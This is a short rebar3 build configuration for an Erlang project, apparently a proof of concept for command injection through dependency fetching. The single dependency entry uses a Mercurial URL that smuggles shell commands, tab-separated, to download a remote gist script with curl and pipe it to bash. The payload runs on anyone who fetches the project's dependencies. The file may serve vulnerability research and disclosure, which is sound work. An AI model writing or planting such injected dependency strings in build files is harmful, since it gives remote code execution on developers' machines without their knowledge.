{erl_opts, [debug_info]}.
{deps, [
 {
   'dephelper', ".*", { hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", 
    "dephelper"
    }}]}.

{shell, [
  % {config, "config/sys.config"},
    {apps, [poc_rebar3]}
]}.
